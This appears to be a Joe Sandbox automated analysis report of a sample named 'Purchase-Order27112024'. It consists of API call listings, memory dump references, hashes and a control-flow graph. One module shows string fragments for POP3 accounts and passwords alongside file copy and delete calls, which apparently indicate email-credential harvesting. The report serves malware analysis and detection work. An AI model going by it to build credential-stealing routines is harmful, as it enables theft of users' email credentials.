• Opcode Fuzzy Hash: deebfc122553c54d9d3913a739eb27c8a22f0defff1e57f7937a0b4eb09835c5
• Instruction Fuzzy Hash: 6231C57494122C9BDB21DF64D988BCDBBF8BF08320F5041DAE81CA7250E7749B858F55
APIs
• GetCurrentProcess.KERNEL32(?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082,37012108,0000000C,37001F3A,?), ref: 37004AD5
• TerminateProcess.KERNEL32(00000000,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082,37012108,0000000C,37001F3A,?), ref: 37004ADC
• ExitProcess.KERNEL32 ref: 37004AEE
Memory Dump Source
• Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
• Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 2f46ccecbff64199a59c625f2f9bd0529fad5a5dfa8630ccf13a7aa1c1dae3b1
• Instruction ID: 6dff514d88ab5fc6754a9a30f77b30a565838d52fdf303b247f64c849eb47dd8
• Opcode Fuzzy Hash: 2f46ccecbff64199a59c625f2f9bd0529fad5a5dfa8630ccf13a7aa1c1dae3b1
• Instruction Fuzzy Hash: E0E0BF35040204AFEF016F55CD09B493BA9FF42371B514094F919A7121DB39D953CE59
APIs
Memory Dump Source
• Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
• Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: d99399c43b44871a00681f5dbd81342f2d9c1c03ca0c9aa8969bfa0371459849
• Instruction ID: a378ed0273b9ead258a4a1455181297d174dc52790f5ce8f93b146292c0c2ed1
• Opcode Fuzzy Hash: d99399c43b44871a00681f5dbd81342f2d9c1c03ca0c9aa8969bfa0371459849
• Instruction Fuzzy Hash: 0DA011302802028FCB208F388A0B30E3AECBA082A03020028A80CE0000EB2880028B00

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405390
• GetDlgItem.USER32(?,000003EE), ref: 0040539F
• GetClientRect.USER32(?,?), ref: 004053DC
• GetSystemMetrics.USER32(00000015), ref: 004053E4
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
• SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
• ShowWindow.USER32(?,00000008), ref: 00405480
• GetDlgItem.USER32(?,000003EC), ref: 004054A1
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
• GetDlgItem.USER32(?,000003F8), ref: 004053AE
  • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
• GetDlgItem.USER32(?,000003EC), ref: 004054F3
• CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
• CloseHandle.KERNEL32(00000000), ref: 00405508
• ShowWindow.USER32(00000000), ref: 0040552C
• ShowWindow.USER32(?,00000008), ref: 00405531
• ShowWindow.USER32(00000008), ref: 0040557B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
• CreatePopupMenu.USER32 ref: 004055C0
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
• GetWindowRect.USER32(?,?), ref: 004055F4
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
• OpenClipboard.USER32(00000000), ref: 00405655
• EmptyClipboard.USER32 ref: 0040565B
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
• GlobalLock.KERNEL32(00000000), ref: 00405671
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
• GlobalUnlock.KERNEL32(00000000), ref: 004056A5
• SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
• CloseClipboard.USER32 ref: 004056B6
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {$&B
• API String ID: 590372296-2518801558
• Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
• Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
• Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
• Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
• ShowWindow.USER32(?), ref: 00403D1B
• DestroyWindow.USER32 ref: 00403D2F
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
• GetDlgItem.USER32(?,?), ref: 00403D6C
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
• IsWindowEnabled.USER32(00000000), ref: 00403D87
• GetDlgItem.USER32(?,00000001), ref: 00403E35
• GetDlgItem.USER32(?,00000002), ref: 00403E3F
• SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
• GetDlgItem.USER32(?,00000003), ref: 00403F50
• ShowWindow.USER32(00000000,?), ref: 00403F71
• EnableWindow.USER32(?,?), ref: 00403F83
• EnableWindow.USER32(?,?), ref: 00403F9E
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
• EnableMenuItem.USER32(00000000), ref: 00403FBB
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
• lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
• SetWindowTextW.USER32(?,004226E8), ref: 00404023
• ShowWindow.USER32(?,0000000A), ref: 00404157
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: &B
• API String ID: 184305955-3208460036
• Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
• Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
• Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
• Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

Control-flow Graph
APIs
  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
  • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
• lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
• lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
• lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
• GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
• RegisterClassW.USER32(004281A0), ref: 00403AC4
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
• ShowWindow.USER32(00000005,00000000), ref: 00403B47
• LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
• LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
• GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
• GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
• RegisterClassW.USER32(004281A0), ref: 00403B89
• DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
• API String ID: 914957316-1918744475
• Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
• Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
• Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
• Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

Control-flow Graph
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
• GetDlgItem.USER32(?,000003E8), ref: 004043E9
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
• GetSysColor.USER32(?), ref: 00404417
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
• lstrlenW.KERNEL32(?), ref: 00404438
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
• GetDlgItem.USER32(?,0000040A), ref: 004044B3
• SendMessageW.USER32(00000000), ref: 004044BA
• GetDlgItem.USER32(?,000003E8), ref: 004044E5
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
• LoadCursorW.USER32(00000000,00007F02), ref: 00404536
• SetCursor.USER32(00000000), ref: 00404539
• ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
• LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
• SetCursor.USER32(00000000), ref: 0040455D
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: N$open
• API String ID: 3615053054-904208323
• Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
• Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
• Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
• Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 648 3700173a-370017fe call 3700c030 call 37002c40 * 2 655 37001803 call 37001cca 648->655 656 37001808-3700180c 655->656 657 37001812-37001816 656->657 658 370019ad-370019b1 656->658 657->658 659 3700181c-37001837 call 37001ede 657->659 662 3700183d-37001845 659->662 663 3700199f-370019ac call 37001ee7 * 2 659->663 664 37001982-37001985 662->664 665 3700184b-3700184e 662->665 663->658 669 37001995-37001999 664->669 670 37001987 664->670 665->664 667 37001854-37001881 call 370044b0 * 2 call 37001db7 665->667 682 37001887-3700189f call 370044b0 call 37001db7 667->682 683 3700193d-37001943 667->683 669->662 669->663 673 3700198a-3700198d call 37002c40 670->673 677 37001992 673->677 677->669 682->683 699 370018a5-370018a8 682->699 684 37001945-37001947 683->684 685 3700197e-37001980 683->685 684->685 687 37001949-3700194b 684->687 685->673 689 37001961-3700197c call 370016aa 687->689 690 3700194d-3700194f 687->690 689->677 692 37001951-37001953 690->692 693 37001955-37001957 690->693 692->689 692->693 696 37001959-3700195b 693->696 697 3700195d-3700195f 693->697 696->689 696->697 697->685 697->689 700 370018c4-370018dc call 370044b0 call 37001db7 699->700 701 370018aa-370018c2 call 370044b0 call 37001db7 699->701 700->669 710 370018e2-3700193b call 370016aa call 370015da call 37002c40 * 2 700->710 701->700 701->710 710->669
APIs
  • Part of subcall function 37001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D1B
  • Part of subcall function 37001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37001D37
  • Part of subcall function 37001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D4B
• _strlen.LIBCMT ref: 37001855
• _strlen.LIBCMT ref: 37001869
• _strlen.LIBCMT ref: 3700188B
• _strlen.LIBCMT ref: 370018AE
• _strlen.LIBCMT ref: 370018C8
Strings
Memory Dump Source
• Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
• Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: 927bebb4ce4892ca4cc19f17c6d5ac490f9e3e9bf37250db30a7b4c639715583
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 7061E275D04218AFFF11CBE4C980BDEB7FAAF45224F4040DAD104A7290EB786A46CF96

Control-flow Graph (rendered graph image not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
• Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 6f974758dbac83a1b2d9b3413d82bb82f090bc691c7bb42bfb8a36123945800c
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 0371F4B1D002285FEB119BB4D994ADF7BFCAB0A360F5040D6E644E7241E678D785CFA1

Control-flow Graph (rendered graph image not reproduced)
APIs
• lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
• GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
• GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
• wsprintfA.USER32 ref: 00405CDE
• GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
• GlobalFree.KERNEL32(00000000), ref: 00405DCF
• CloseHandle.KERNEL32(00000000), ref: 00405DD6
  • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
  • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]
• API String ID: 1265525490-899692902
• Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
• Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
• Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
• Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
• Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
• Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
• Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404684
• SetWindowTextW.USER32(00000000,?), ref: 004046AE
• SHBrowseForFolderW.SHELL32(?), ref: 0040475F
• CoTaskMemFree.OLE32(00000000), ref: 0040476A
• lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
• lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
  • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
  • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
  • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
  • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
  • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
• GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
• SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$&B
• API String ID: 2246997448-2586977930
• Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
• Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
• Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
• Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 37007D06
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090D7
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090E9
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370090FB
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700910D
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700911F
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009131
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009143
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009155
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009167
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 37009179
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700918B
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 3700919D
                                                                                                        • Part of subcall function 370090BA: _free.LIBCMT ref: 370091AF
                                                                                                      • _free.LIBCMT ref: 37007CFB
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 37007D1D
                                                                                                      • _free.LIBCMT ref: 37007D32
                                                                                                      • _free.LIBCMT ref: 37007D3D
                                                                                                      • _free.LIBCMT ref: 37007D5F
                                                                                                      • _free.LIBCMT ref: 37007D72
                                                                                                      • _free.LIBCMT ref: 37007D80
                                                                                                      • _free.LIBCMT ref: 37007D8B
                                                                                                      • _free.LIBCMT ref: 37007DC3
                                                                                                      • _free.LIBCMT ref: 37007DCA
                                                                                                      • _free.LIBCMT ref: 37007DE7
                                                                                                      • _free.LIBCMT ref: 37007DFF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: f7dbfba64d2765795683c5b4f92f5ceef69a9d79713e29f13d1faa00e923c0d8
                                                                                                      • Instruction ID: 263c59e433a89f9f2d0c157573922eef8421f2d08e817d75d35dcbeb18e1d40e
                                                                                                      • Opcode Fuzzy Hash: f7dbfba64d2765795683c5b4f92f5ceef69a9d79713e29f13d1faa00e923c0d8
